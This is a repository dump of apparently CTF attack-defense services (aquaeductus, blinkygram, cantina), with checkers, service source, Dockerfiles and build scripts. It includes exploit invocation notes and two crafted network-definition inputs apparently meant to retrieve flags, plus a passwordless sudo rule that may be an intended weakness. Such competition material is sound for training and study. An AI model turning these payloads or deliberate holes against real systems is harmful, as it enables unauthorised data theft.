irc.f90 │ │ ├── mqueue │ │ │ └── mqueue.f90 │ │ ├── msg │ │ │ └── msg.f90 │ │ ├── mutex │ │ │ └── mutex.f90 │ │ ├── os │ │ │ └── os.F90 │ │ ├── pid │ │ │ └── pid.f90 │ │ ├── pipe │ │ │ └── pipe.f90 │ │ ├── pthread │ │ │ └── pthread.f90 │ │ ├── regex │ │ │ └── regex.f90 │ │ ├── semaphore │ │ │ └── semaphore.f90 │ │ ├── serial │ │ │ └── serial.f90 │ │ ├── signal │ │ │ └── signal.f90 │ │ ├── socket │ │ │ └── socket.f90 │ │ ├── time │ │ │ └── time.f90 │ │ ├── uname │ │ │ └── uname.f90 │ │ └── uptime │ │ │ └── uptime.f90 │ │ ├── fpm.toml │ │ └── src │ │ ├── unix.F90 │ │ ├── unix_dirent.F90 │ │ ├── unix_errno.F90 │ │ ├── unix_fcntl.F90 │ │ ├── unix_inet.F90 │ │ ├── unix_ioctl.F90 │ │ ├── unix_ipc.F90 │ │ ├── unix_macro.c │ │ ├── unix_mqueue.F90 │ │ ├── unix_msg.F90 │ │ ├── unix_netdb.F90 │ │ ├── unix_pthread.F90 │ │ ├── unix_regex.F90 │ │ ├── unix_semaphore.F90 │ │ ├── unix_signal.F90 │ │ ├── unix_socket.F90 │ │ ├── unix_stat.F90 │ │ ├── unix_stdio.F90 │ │ ├── unix_stdlib.F90 │ │ ├── unix_string.F90 │ │ ├── unix_syslog.F90 │ │ ├── unix_termios.F90 │ │ ├── unix_time.F90 │ │ ├── unix_types.F90 │ │ ├── unix_unistd.F90 │ │ ├── unix_utsname.F90 │ │ └── unix_wait.F90 │ ├── main.f │ ├── mod_bucket.f │ ├── mod_consumption.f │ ├── mod_crypto.f │ ├── mod_turbine.f │ └── mod_user.f ├── exploits ├── exploit1.py ├── exploit2.py ├── exploit2_checksum.f ├── exploit3.py └── winds_of_the_past.py ├── meta.env └── winds_of_the_past.png /aquaeductus/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY Network.py /checker/Network.py 11 | COPY WeatherReport.py /checker/WeatherReport.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | 15 | # set this to _checker 16 | ENV CTF_SERVICE aquaeductus_checker1 17 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} # ip, team, tick 10 | # note that your service should be able to handle domain names and IP addresses 11 | network_mode: host 12 | volumes: 13 | - checkerstate:/tmp 14 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | numpy -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE aquaeductus_checker2 15 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker2`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} # ip, team, tick 10 | # note that your service should be able to handle domain names and IP addresses 11 | network_mode: host 12 | volumes: 13 | - checkerstate:/tmp 14 | -------------------------------------------------------------------------------- /aquaeductus/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | numpy 3 | beautifulsoup4 4 | -------------------------------------------------------------------------------- /aquaeductus/dist/README.md: -------------------------------------------------------------------------------- 1 | # Aquaeductus 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `XXXXXXXX:YYYYYYYY`, flag is gardens `XXXXXXXX` and `YYYYYYYY` (same flag in both gardens) 6 | - Flagstore 2: `XXXXXXXX`, flag is in garden `XXXXXXXX` 7 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/controllers/index.go: -------------------------------------------------------------------------------- 1 | package controllers 2 | 3 | import ( 4 | "net/http" 5 | 6 | "github.com/gin-gonic/gin" 7 | "gorm.io/gorm" 8 | ) 9 | 10 | type IndexController struct { 11 | db *gorm.DB 12 | } 13 | 14 | func NewIndexController(db *gorm.DB) *IndexController { 15 | return &IndexController{db: db} 16 | } 17 | 18 | func (c *IndexController) Index(ctx *gin.Context) { 19 | ctx.HTML(http.StatusOK, "index", gin.H{ 20 | "title": "Index", 21 | }) 22 | } 23 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/middlewares/errors.go: -------------------------------------------------------------------------------- 1 | package middlewares 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "github.com/rs/zerolog/log" 6 | ) 7 | 8 | func ErrorLogging() gin.HandlerFunc { 9 | return func(c *gin.Context) { 10 | c.Next() 11 | 12 | for _, e := range c.Errors { 13 | log.Error().Err(e).Send() 14 | } 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/middlewares/session.go: -------------------------------------------------------------------------------- 1 | package middlewares 2 | 3 | import ( 4 | "net/http" 5 | 6 | "github.com/gin-contrib/sessions" 7 | "github.com/gin-contrib/sessions/cookie" 8 | "github.com/gin-gonic/gin" 9 | ) 10 | 11 | func Session(authKey, encryptKey []byte) gin.HandlerFunc { 12 | store := cookie.NewStore(authKey, encryptKey) 13 | 14 | store.Options(sessions.Options{ 15 | MaxAge: 24 * 60 * 60, 16 | HttpOnly: true, 17 | SameSite: http.SameSiteStrictMode, 18 | }) 19 | 20 | return sessions.Sessions("session", store) 21 | } 22 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/models/config.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | type Config struct { 4 | Key string `gorm:"type:varchar(255);primarykey"` 5 | Value []byte `gorm:"type:varbinary(255);not null"` 6 | } 7 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/models/user.go: -------------------------------------------------------------------------------- 1 | package models 2 | 3 | import ( 4 | "time" 5 | ) 6 | 7 | type User struct { 8 | ID uint `gorm:"primarykey"` 9 | Username string `gorm:"type:varchar(255);not null;unique"` 10 | Password []byte `gorm:"type:varbinary(255);not null"` 11 | CreatedAt time.Time `gorm:"autoCreateTime:milli;type:timestamp;not null"` 12 | UpdatedAt time.Time `gorm:"autoUpdateTime:milli;type:timestamp;not null"` 13 | } 14 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/layers.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | var layers = []Layer{ 4 | &PermutationLayer{}, 5 | &RandomLayer{}, 6 | } 7 | 8 | type Layer interface { 9 | LayerName() string 10 | } 11 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/permutation.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | import ( 4 | "math/rand" 5 | ) 6 | 7 | type PermutationLayer struct { 8 | } 9 | 10 | func (l *PermutationLayer) LayerName() string { 11 | return "PermutationLayer" 12 | } 13 | 14 | func (l *PermutationLayer) Handle(input ...float64) []float64 { 15 | n := make([]float64, len(input)) 16 | copy(n, input) 17 | 18 | rand.Shuffle(len(n), func(i, j int) { n[i], n[j] = n[j], n[i] }) 19 | 20 | return n 21 | } 22 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/network/random.go: -------------------------------------------------------------------------------- 1 | package network 2 | 3 | import "math/rand" 4 | 5 | type RandomLayer struct { 6 | } 7 | 8 | func (l *RandomLayer) LayerName() string { 9 | return "RandomLayer" 10 | } 11 | 12 | func (l *RandomLayer) Handle(n int) []float64 { 13 | r := make([]float64, n) 14 | 15 | for i := 0; i < n; i++ { 16 | r[i] = rand.Float64() 17 | } 18 | 19 | return r 20 | } 21 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/public/assets/aquaeductus.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/aquaeductus/dist/src/public/assets/aquaeductus.jpg -------------------------------------------------------------------------------- /aquaeductus/dist/src/public/assets/custom.css: -------------------------------------------------------------------------------- 1 | body { 2 | background: rgb(255,255,255); 3 | background: linear-gradient(332deg, rgba(255,255,255,1) 0%, rgba(182,246,238,1) 100%); 4 | } 5 | 6 | .image.is-1by1 img.img-front { 7 | width: 75%; 8 | height: auto; 9 | border: 10px solid #ffffff; 10 | box-shadow: 0px 0px 10px 0px #000000; 11 | margin: 5rem 5rem 1rem 1rem; 12 | } -------------------------------------------------------------------------------- /aquaeductus/dist/src/release.wasm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/aquaeductus/dist/src/release.wasm -------------------------------------------------------------------------------- /aquaeductus/dist/src/secrets.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "errors" 5 | 6 | "aquaeductus/models" 7 | "gorm.io/gorm" 8 | ) 9 | 10 | func secretGetOrInit(key string, initializer func() []byte) []byte { 11 | var config models.Config 12 | if result := Gorm.Where("`key` = ?", key).First(&config); result.Error != nil { 13 | if !errors.Is(result.Error, gorm.ErrRecordNotFound) { 14 | panic(result.Error) 15 | } 16 | 17 | config.Key = key 18 | config.Value = initializer() 19 | 20 | if result := Gorm.Create(&config); result.Error != nil { 21 | panic(result.Error) 22 | } 23 | } 24 | 25 | return config.Value 26 | } 27 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/desert.html: -------------------------------------------------------------------------------- 1 | {{define "desert"}} 2 | {{template "header" .}} 3 | 4 |
5 |
6 | 7 |

...

8 | 9 |
10 |
11 | 12 | {{template "footer" .}} 13 | {{end}} 14 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/footer.html: -------------------------------------------------------------------------------- 1 | {{define "footer"}} 2 | 3 | 4 |
5 |
6 |

7 | Save water, maximize growth. Powered by AI. 8 |

9 |
10 |
11 | 12 | {{end}} 13 | -------------------------------------------------------------------------------- /aquaeductus/dist/src/views/header.html: -------------------------------------------------------------------------------- 1 | {{define "header"}} 2 | 3 | 4 | 5 | 6 | {{ .title }} - aquaeductus 7 | 8 | 9 | 10 | 11 | 12 |
13 | {{end}} 14 | -------------------------------------------------------------------------------- /aquaeductus/exploits/README.md: -------------------------------------------------------------------------------- 1 | Our exploit has no dependencies. It can be invoked as follows: 2 | 3 | ./exploit1 IP FLAG_ID 4 | -------------------------------------------------------------------------------- /aquaeductus/exploits/exploit2_2_network.txt: -------------------------------------------------------------------------------- 1 | InputLayer linear 2 | 6 3 | InputNode 1 4 | InputNode 2 5 | InputNode 3 6 | InputNode 4 7 | InputNode 5 8 | InputNode 6 9 | 10 | WeatherLayer linear 11 | 6 12 | InputNode 1 13 | InputNode 2 14 | InputNode 3 15 | InputNode 4 16 | InputNode 5 17 | InputNode 6 18 | Garden.Instructions 19 | -------------------------------------------------------------------------------- /aquaeductus/exploits/exploit2_3_network.txt: -------------------------------------------------------------------------------- 1 | InputLayer linear 2 | 2 3 | InputNode 0 4 | InputNode 0 5 | 6 | LocationLayer linear 7 | 2 8 | RetrievalNode Instructions 9 | RetrievalNode Longitude 10 | 11 | -------------------------------------------------------------------------------- /aquaeductus/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | hexdump 3 | -------------------------------------------------------------------------------- /aquaeductus/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=aquaeductus 2 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.dockerignore: -------------------------------------------------------------------------------- 1 | node_modules/ 2 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules/ 2 | build/ 3 | -------------------------------------------------------------------------------- /aquaeductus/wasm/.prettierrc.json: -------------------------------------------------------------------------------- 1 | { 2 | "tabWidth": 4, 3 | "semi": true, 4 | "singleQuote": true, 5 | "trailingComma": "es5" 6 | } 7 | -------------------------------------------------------------------------------- /aquaeductus/wasm/Dockerfile: -------------------------------------------------------------------------------- 1 | ########################################################################################################## 2 | # Builder 3 | ########################################################################################################## 4 | FROM node:16 AS builder 5 | 6 | RUN apt-get update \ 7 | && apt-get install -y \ 8 | build-essential \ 9 | && rm -rf /var/lib/apt/lists/* 10 | 11 | WORKDIR /app 12 | 13 | COPY package.json package.json 14 | COPY package-lock.json package-lock.json 15 | 16 | RUN npm ci 17 | 18 | COPY . . 19 | 20 | RUN npm run asbuild:release 21 | -------------------------------------------------------------------------------- /aquaeductus/wasm/asconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "targets": { 3 | "debug": { 4 | "outFile": "build/debug.wasm", 5 | "textFile": "build/debug.wat", 6 | "sourceMap": true, 7 | "debug": true, 8 | "optimize": false 9 | }, 10 | "release": { 11 | "outFile": "build/release.wasm", 12 | "textFile": "build/release.wat", 13 | "optimize": true, 14 | "optimizeLevel": 3, 15 | "shrinkLevel": 1, 16 | "converge": true, 17 | "noAssert": true 18 | } 19 | }, 20 | "options": { 21 | "bindings": "esm", 22 | "runtime": "stub" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /aquaeductus/wasm/assembly/rpc.ts: -------------------------------------------------------------------------------- 1 | export declare function instantiate(pck: string, struct: string): i64; 2 | export declare function invoke( 3 | handler: i64, 4 | method: string, 5 | parameters: string 6 | ): string; 7 | export declare function retrieve( 8 | handler: i64, 9 | prop: string 10 | ): string; 11 | -------------------------------------------------------------------------------- /aquaeductus/wasm/assembly/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "extends": "assemblyscript/std/assembly.json", 3 | "include": ["./**/*.ts"] 4 | } 5 | -------------------------------------------------------------------------------- /aquaeductus/wasm/build.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | set -e 3 | 4 | rm -rf build 5 | 6 | docker build -t ecsc2022-aquaeductus-wasm:latest . 7 | 8 | CONTAINER_ID=$(docker create ecsc2022-aquaeductus-wasm:latest) 9 | docker cp $CONTAINER_ID:/app/build . 10 | docker rm $CONTAINER_ID 11 | -------------------------------------------------------------------------------- /aquaeductus/wasm/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "private": true, 3 | "type": "module", 4 | "exports": { 5 | ".": { 6 | "import": "./build/release.js", 7 | "types": "./build/release.d.ts" 8 | } 9 | }, 10 | "scripts": { 11 | "lint": "prettier --check ./assembly", 12 | "lint:fix": "prettier --write ./assembly", 13 | "asbuild:debug": "asc assembly/index.ts --target debug", 14 | "asbuild:release": "asc assembly/index.ts --target release", 15 | "asbuild": "npm run asbuild:debug && npm run asbuild:release", 16 | "start": "npx serve ." 17 | }, 18 | "dependencies": { 19 | "assemblyscript": "^0.21.2", 20 | "assemblyscript-regex": "^1.6.4" 21 | }, 22 | "devDependencies": { 23 | "prettier": "2.7.1" 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /blinkygram/.clang-format: -------------------------------------------------------------------------------- 1 | UseTab: ForIndentation 2 | TabWidth: 4 3 | IndentWidth: 4 4 | 5 | BreakBeforeBraces: Custom 6 | BraceWrapping: 7 | AfterFunction: true 8 | 9 | AllowShortFunctionsOnASingleLine: false -------------------------------------------------------------------------------- /blinkygram/blinkygram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/blinkygram/blinkygram.png -------------------------------------------------------------------------------- /blinkygram/checkers/README.md: -------------------------------------------------------------------------------- 1 | # Checkers 2 | 3 | ## Checker 1 4 | 5 | Backup flagstore and server checks. 6 | 7 | ## Checker 2 8 | 9 | Market flagstore and market bot checks. 10 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY *.py /checker/ 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | ENV CTF_SERVICE blinkygram_checker1 14 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY *.py /checker/ 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | ENV CTF_SERVICE blinkygram_checker2 14 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | checkerstate: 5 | 6 | services: 7 | checker: 8 | build: . 9 | command: localhost 1 ${TICK} 10 | network_mode: host 11 | volumes: 12 | - checkerstate:/tmp 13 | -------------------------------------------------------------------------------- /blinkygram/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/dist/README.md: -------------------------------------------------------------------------------- 1 | # blinkygram 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `backup:XXX/YYY`, flag is in backup with ID `YYY` of user with ID `XXX` 6 | - Flagstore 2: `item:XXX`, flag is content of market item with ID `XXX` 7 | -------------------------------------------------------------------------------- /blinkygram/dist/bot/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y libssl1.1 4 | 5 | RUN useradd bot 6 | 7 | WORKDIR /app 8 | 9 | RUN mkdir /app/storage && chmod 777 /app/storage 10 | 11 | COPY ./bot ./ 12 | RUN chmod +x ./bot 13 | 14 | USER bot 15 | 16 | ENTRYPOINT ["./bot"] 17 | -------------------------------------------------------------------------------- /blinkygram/dist/bot/bot: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/blinkygram/dist/bot/bot -------------------------------------------------------------------------------- /blinkygram/dist/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | volumes: 4 | bot-storage: 5 | server-storage: 6 | 7 | services: 8 | blinkygram-bot: 9 | read_only: true 10 | build: ./bot 11 | restart: unless-stopped 12 | volumes: 13 | - bot-storage:/app/storage 14 | environment: 15 | - BOT_SERVER_HOST=blinkygram-server 16 | - BOT_SERVER_PORT=10050 17 | - BOT_WORKERS=32 18 | depends_on: 19 | - blinkygram-server 20 | links: 21 | - blinkygram-server 22 | blinkygram-server: 23 | read_only: true 24 | tmpfs: 25 | - /tmp 26 | build: ./server 27 | restart: unless-stopped 28 | volumes: 29 | - server-storage:/app/storage 30 | environment: 31 | - SERVER_BIND_HOST=0.0.0.0 32 | - SERVER_BIND_PORT=10050 33 | - SERVER_WORKERS=1 34 | - SERVER_THROTTLE_RPS=10 35 | ports: 36 | - '0.0.0.0:10050:10050' 37 | -------------------------------------------------------------------------------- /blinkygram/dist/server/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update && apt-get install -y zip sudo 4 | 5 | RUN useradd server && useradd userbackup 6 | RUN echo 'server ALL=(userbackup:userbackup) NOPASSWD: ALL' >> /etc/sudoers 7 | 8 | WORKDIR /app 9 | 10 | RUN mkdir /app/storage && chmod 777 /app/storage 11 | 12 | COPY requirements.txt ./ 13 | RUN pip install -r requirements.txt 14 | 15 | COPY *.py ./ 16 | 17 | USER server 18 | 19 | ENTRYPOINT ["./main.py"] 20 | -------------------------------------------------------------------------------- /blinkygram/dist/server/globals.py: -------------------------------------------------------------------------------- 1 | import dataclasses 2 | 3 | from auth import Authenticator 4 | from database import Database 5 | 6 | 7 | @dataclasses.dataclass 8 | class Globals: 9 | backup_path: str = None 10 | auth: Authenticator = None 11 | db: Database = None 12 | 13 | 14 | G = Globals() 15 | -------------------------------------------------------------------------------- /blinkygram/dist/server/requirements.txt: -------------------------------------------------------------------------------- 1 | aiosqlite 2 | ecdsa 3 | -------------------------------------------------------------------------------- /blinkygram/dist/server/utils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import grp 3 | import pwd 4 | 5 | from functools import lru_cache 6 | 7 | 8 | USER_BACKUP = 'userbackup' 9 | USER_SERVER = 'server' 10 | 11 | 12 | @lru_cache 13 | def get_uid(username) -> int: 14 | passwd = pwd.getpwnam(username) 15 | return passwd.pw_uid 16 | 17 | 18 | @lru_cache 19 | def get_gid(name) -> int: 20 | group = grp.getgrnam(name) 21 | return group.gr_gid 22 | 23 | 24 | def set_perms(path, owner, group, mode): 25 | uid = get_uid(owner) 26 | gid = get_gid(group) 27 | os.chown(path, uid, gid) 28 | os.chmod(path, mode) 29 | 30 | 31 | def set_perms_server(path): 32 | mode = 0o770 if os.path.isdir(path) else 0o660 33 | set_perms(path, USER_SERVER, USER_SERVER, mode) 34 | -------------------------------------------------------------------------------- /blinkygram/exploits/README.md: -------------------------------------------------------------------------------- 1 | # Exploits 2 | 3 | The exploits are `exploitN.py`, where `N` is the vulnerability number (see main README). 4 | The other files are helper modules. 5 | See `requirements.txt` for Python dependencies. 6 | 7 | Invoke as: 8 | 9 | ``` 10 | $ ./exploitN.py 11 | ``` 12 | -------------------------------------------------------------------------------- /blinkygram/exploits/requirements.txt: -------------------------------------------------------------------------------- 1 | ecdsa 2 | -------------------------------------------------------------------------------- /blinkygram/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=blinkygram 2 | -------------------------------------------------------------------------------- /blinkygram/src/.gitignore: -------------------------------------------------------------------------------- 1 | # Build outputs 2 | /out/ 3 | -------------------------------------------------------------------------------- /blinkygram/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y build-essential libssl-dev 4 | 5 | ENTRYPOINT ["make", "-C", "/buildroot/src"] 6 | -------------------------------------------------------------------------------- /blinkygram/src/build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | sudo docker build -t ecsc22-service-5-builder . && \ 4 | sudo docker run --rm \ 5 | --user "$(id -u):$(id -g)" \ 6 | -v "$PWD/../":/buildroot \ 7 | ecsc22-service-5-builder "$@" 8 | -------------------------------------------------------------------------------- /blinkygram/src/src/bot/chat.h: -------------------------------------------------------------------------------- 1 | #ifndef CHAT_H 2 | #define CHAT_H 3 | 4 | #include 5 | 6 | #include "bot.h" 7 | 8 | /** 9 | * A bot_chat_callback that implements the bot's logic. 10 | */ 11 | bool chat_callback(struct bot *bot, const struct bot_chat_msg *msg); 12 | 13 | #endif 14 | -------------------------------------------------------------------------------- /blinkygram/src/src/dist/README.md: -------------------------------------------------------------------------------- 1 | # blinkygram 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: `backup:XXX/YYY`, flag is in backup with ID `YYY` of user with ID `XXX` 6 | - Flagstore 2: `item:XXX`, flag is content of market item with ID `XXX` 7 | -------------------------------------------------------------------------------- /blinkygram/src/src/docker/Dockerfile.bot: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | RUN apt-get update && apt-get install -y libssl1.1 4 | 5 | RUN useradd bot 6 | 7 | WORKDIR /app 8 | 9 | RUN mkdir /app/storage && chmod 777 /app/storage 10 | 11 | COPY ./bot ./ 12 | RUN chmod +x ./bot 13 | 14 | USER bot 15 | 16 | ENTRYPOINT ["./bot"] 17 | -------------------------------------------------------------------------------- /blinkygram/src/src/docker/Dockerfile.server: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update && apt-get install -y zip sudo 4 | 5 | RUN useradd server && useradd userbackup 6 | RUN echo 'server ALL=(userbackup:userbackup) NOPASSWD: ALL' >> /etc/sudoers 7 | 8 | WORKDIR /app 9 | 10 | RUN mkdir /app/storage && chmod 777 /app/storage 11 | 12 | COPY requirements.txt ./ 13 | RUN pip install -r requirements.txt 14 | 15 | COPY *.py ./ 16 | 17 | USER server 18 | 19 | ENTRYPOINT ["./main.py"] 20 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/globals.py: -------------------------------------------------------------------------------- 1 | import dataclasses 2 | 3 | from auth import Authenticator 4 | from database import Database 5 | 6 | 7 | @dataclasses.dataclass 8 | class Globals: 9 | backup_path: str = None 10 | auth: Authenticator = None 11 | db: Database = None 12 | 13 | 14 | G = Globals() 15 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/requirements.txt: -------------------------------------------------------------------------------- 1 | aiosqlite 2 | ecdsa 3 | -------------------------------------------------------------------------------- /blinkygram/src/src/server/utils.py: -------------------------------------------------------------------------------- 1 | import os 2 | import grp 3 | import pwd 4 | 5 | from functools import lru_cache 6 | 7 | 8 | USER_BACKUP = 'userbackup' 9 | USER_SERVER = 'server' 10 | 11 | 12 | @lru_cache 13 | def get_uid(username) -> int: 14 | passwd = pwd.getpwnam(username) 15 | return passwd.pw_uid 16 | 17 | 18 | @lru_cache 19 | def get_gid(name) -> int: 20 | group = grp.getgrnam(name) 21 | return group.gr_gid 22 | 23 | 24 | def set_perms(path, owner, group, mode): 25 | uid = get_uid(owner) 26 | gid = get_gid(group) 27 | os.chown(path, uid, gid) 28 | os.chmod(path, mode) 29 | 30 | 31 | def set_perms_server(path): 32 | mode = 0o770 if os.path.isdir(path) else 0o660 33 | set_perms(path, USER_SERVER, USER_SERVER, mode) 34 | -------------------------------------------------------------------------------- /cantina/cantina.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/cantina/cantina.png -------------------------------------------------------------------------------- /cantina/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | # Add requirements 7 | COPY checker1/requirements.txt /checker/requirements.txt 8 | RUN pip install -r requirements.txt 9 | 10 | # Add common cantina files/modules 11 | COPY common/cantina/cantina /checker/cantina 12 | COPY common/cantinautils /checker/cantinautils 13 | COPY common/message-ids.yaml /conf/message-ids.yaml 14 | 15 | # Add checker 16 | COPY checker1/checker.py /checker/checker.py 17 | USER ctf-checkermaster 18 | ENV CTF_CHECKERSCRIPT /checker/checker.py 19 | 20 | # set this to _checker 21 | ENV CTF_SERVICE cantina_checker1 22 | -------------------------------------------------------------------------------- /cantina/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick 